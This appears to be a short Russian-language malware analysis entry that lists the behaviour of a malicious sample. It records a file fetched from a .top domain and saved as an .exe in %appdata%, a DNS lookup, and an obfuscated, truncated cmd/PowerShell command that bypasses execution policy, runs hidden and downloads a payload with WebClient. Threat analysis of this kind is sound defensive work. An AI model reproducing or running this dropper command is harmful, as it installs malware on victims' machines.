Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^owE^rshelL.ex^E -e^XECUTIoNP^o^lIC^y ^By^P^AsS -NO^p^ROfIle -wi^N^DO^WsT^ylE hiDDEn ^(^N^e^w^-^ob^JecT ^sYs^t^em.^Ne^t^.WEBC^LI^Ent).DO^WNLoADFI^L^E^('http://www.zonedopesa....
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /c "p^owE^rshelL.ex^E -e^XECUTIoNP^o^lIC^y ^By^P^AsS -NO^p^ROfIle -wi^N^DO^WsT^ylE hiDDEn ^(^N^e^w^-^ob^JecT ^sYs^t^em.^Ne^t^.WEBC^LI^Ent).DO^WNLoADFI^L^E^('http://www.zonedopesa....' (со скрытым окном)